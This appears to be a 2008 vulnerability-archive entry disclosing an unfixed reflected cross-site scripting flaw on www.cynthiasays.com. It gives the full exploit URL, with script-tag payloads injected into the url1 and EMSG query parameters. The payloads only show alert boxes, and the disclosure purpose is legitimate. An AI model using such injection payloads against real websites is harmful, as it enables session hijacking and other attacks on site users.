Security researcher AppleJax, has submitted on 26/06/2008 a cross-site-scripting (XSS) vulnerability affecting www.cynthiasays.com, which at the time of submission ranked 66452 on the web according to Alexa.
We manually validated and published a mirror of this vulnerability on 07/11/2008. It is currently unfixed.
If you believe that this security issue has been corrected, please send us an e-mail. |
| Date submitted: 26/06/2008 |
Date published: 07/11/2008 |
Fixed? Mail us! | Status:  UNFIXED |
| Author: AppleJax |
Domain: www.cynthiasays.com |
Category: XSS |
Pagerank: 66452 |
|---|
URL: http://www.cynthiasays.com/fulloptions.asp?BROWSE_EMUL=Cynthia+1.0&rptmode=%2D1&url1=%22%3E%3Cscript
%3Ealert%28%27Cynthia+Says%3A+I+have+XSS+issues%21%27%29%3B%3C/script%3E&EMSG=%0D%0A%3Cbr%3EThe+URL%
3A+%22%3E%3Cscript%3Ealert%28%27Cynthia+Says%3A+I+have+XSS+issues%21%27%29%3B%3C/script%3E+has+an+un
supported+URL+Scheme.++URL+Entries+must+start+with+either+%27http%3A//%27+or+%27https%3A//%27.<scrip
t>alert('Even%20the%20error%20message%20itself%20is%20vulnerable!');</script> |
|
Click here to view the mirror
|
|
|
| 
